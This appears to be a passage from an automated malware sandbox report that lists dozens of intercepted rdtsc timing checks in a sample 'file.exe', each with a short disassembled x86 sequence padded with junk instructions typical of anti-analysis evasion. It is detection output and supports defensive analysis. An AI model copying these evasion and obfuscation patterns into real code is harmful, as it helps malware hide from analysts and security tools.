              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7806A3 second address: 7690B9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F63C8D82F4Bh 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F63C8D82F48h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 call dword ptr [ebp+122D3592h] 0x0000002d pushad 0x0000002e jmp 00007F63C8D82F59h 0x00000033 push eax 0x00000034 jmp 00007F63C8D82F4Bh 0x00000039 pop eax 0x0000003a popad 0x0000003b pushad 0x0000003c je 00007F63C8D82F53h 0x00000042 pushad 0x00000043 popad 0x00000044 jmp 00007F63C8D82F4Bh 0x00000049 pushad 0x0000004a pushad 0x0000004b popad 0x0000004c jg 00007F63C8D82F46h 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9703 second address: 7B971F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jc 00007F63C8B57C16h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f jmp 00007F63C8B57C1Dh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9A0B second address: 7B9A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F63C8D82F46h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9D49 second address: 7B9D74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F63C8B57C1Bh 0x00000009 js 00007F63C8B57C16h 0x0000000f popad 0x00000010 push ecx 0x00000011 jmp 00007F63C8B57C21h 0x00000016 pushad 0x00000017 popad 0x00000018 pop ecx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BD7D1 second address: 7BD7E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F63C8D82F53h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BD7E8 second address: 7BD7EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6907 second address: 7C690D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C61BD second address: 7C61DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F63C8B57C25h 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C630F second address: 7C633F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 jmp 00007F63C8D82F52h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jc 00007F63C8D82F73h 0x00000013 push eax 0x00000014 push edi 0x00000015 pop edi 0x00000016 pushad 0x00000017 popad 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jl 00007F63C8D82F46h 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6612 second address: 7C6618 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C8867 second address: 7C886B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CB22C second address: 7CB253 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8B57C1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F63C8B57C22h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CEB0B second address: 7CEB0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CEB0F second address: 7CEB1E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F63C8B57C16h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CED24 second address: 7CED33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F63C8D82F46h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CED33 second address: 7CED39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2255 second address: 7D2264 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnp 00007F63C8D82F46h 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2264 second address: 7D226A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D23E7 second address: 7D2414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jl 00007F63C8D82F46h 0x0000000c popad 0x0000000d push edi 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop edi 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007F63C8D82F50h 0x00000018 push eax 0x00000019 push edx 0x0000001a js 00007F63C8D82F46h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2414 second address: 7D2418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2418 second address: 7D2426 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F63C8D82F46h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D26D0 second address: 7D26D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D26D4 second address: 7D26D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D26D8 second address: 7D26EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F63C8B57C16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F63C8B57C16h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D282B second address: 7D283B instructions: 0x00000000 rdtsc 0x00000002 js 00007F63C8D82F52h 0x00000008 jns 00007F63C8D82F46h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7468C1 second address: 7468D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jl 00007F63C8B57C20h 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D72E3 second address: 7D72FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F63C8D82F56h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D72FF second address: 7D7305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D7305 second address: 7D730F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D730F second address: 7D7313 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D7313 second address: 7D732E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F63C8D82F51h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D732E second address: 7D7333 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D7333 second address: 7D734E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F63C8D82F4Eh 0x00000009 pop ecx 0x0000000a ja 00007F63C8D82F52h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D734E second address: 7D7354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D7462 second address: 7D746B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D746B second address: 7D7488 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F63C8B57C1Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jnc 00007F63C8B57C16h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D7488 second address: 7D7491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D75CE second address: 7D75EA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F63C8B57C16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnp 00007F63C8B57C18h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jp 00007F63C8B57C16h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D772E second address: 7D7738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F63C8D82F46h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D81D1 second address: 7D81D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D81D7 second address: 7D81DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D81DB second address: 7D81E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0021 second address: 7E002E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007F63C8D82F46h 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE0D9 second address: 7DE0DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE0DF second address: 7DE0E5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE0E5 second address: 7DE0EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE0EC second address: 7DE0F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE3BA second address: 7DE3BF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE6B3 second address: 7DE6CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F63C8D82F55h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE6CD second address: 7DE6D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE6D2 second address: 7DE6EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F63C8D82F4Dh 0x0000000c jp 00007F63C8D82F46h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 780347 second address: 78034B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DF808 second address: 7DF80C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DF80C second address: 7DF814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DFD62 second address: 7DFD66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DFD66 second address: 7DFD6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3B85 second address: 7E3B89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3B89 second address: 7E3BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F63C8B57C26h 0x0000000e jmp 00007F63C8B57C1Ah 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3E2E second address: 7E3E34 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E43ED second address: 7E43F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E43F3 second address: 7E43F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E8D28 second address: 7E8D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EFFE4 second address: 7EFFE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EE1FF second address: 7EE205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EE205 second address: 7EE211 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F63C8D82F46h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EE7B8 second address: 7EE7D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F63C8B57C26h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EE7D9 second address: 7EE7DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EE92A second address: 7EE93E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F63C8B57C1Fh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EE93E second address: 7EE94F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 jl 00007F63C8D82F46h 0x0000000d popad 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EEACB second address: 7EEACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EEACF second address: 7EEAD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EEAD3 second address: 7EEAD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EED94 second address: 7EEDB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F63C8D82F53h 0x00000009 jnl 00007F63C8D82F46h 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EEDB2 second address: 7EEDB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F730F second address: 7F7314 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F7314 second address: 7F731A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F731A second address: 7F7323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F7323 second address: 7F7327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F6DA0 second address: 7F6DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F63C8D82F46h 0x0000000d jmp 00007F63C8D82F4Dh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805315 second address: 805331 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8B57C22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805331 second address: 805335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805335 second address: 805347 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F63C8B57C1Eh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805347 second address: 805365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F63C8D82F56h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805365 second address: 80536F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F63C8B57C16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 804EBE second address: 804EC8 instructions: 0x00000000 rdtsc 0x00000002 js 00007F63C8D82F46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80756A second address: 807570 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 807570 second address: 807584 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F63C8D82F46h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007F63C8D82F52h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 807584 second address: 80758A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809E9F second address: 809EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809EA3 second address: 809ED2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8B57C20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F63C8B57C18h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F63C8B57C20h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8098A1 second address: 8098AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F63C8D82F46h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8098AB second address: 8098AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8098AF second address: 8098BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F63C8D82F46h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8098BF second address: 8098C9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F63C8B57C16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809A78 second address: 809A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F63C8D82F46h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809A82 second address: 809A9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8B57C1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F63C8B57C1Ch 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809A9C second address: 809AA1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80F2B8 second address: 80F2BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80F2BC second address: 80F2F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F63C8D82F59h 0x00000009 jmp 00007F63C8D82F58h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80F2F1 second address: 80F309 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8B57C1Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
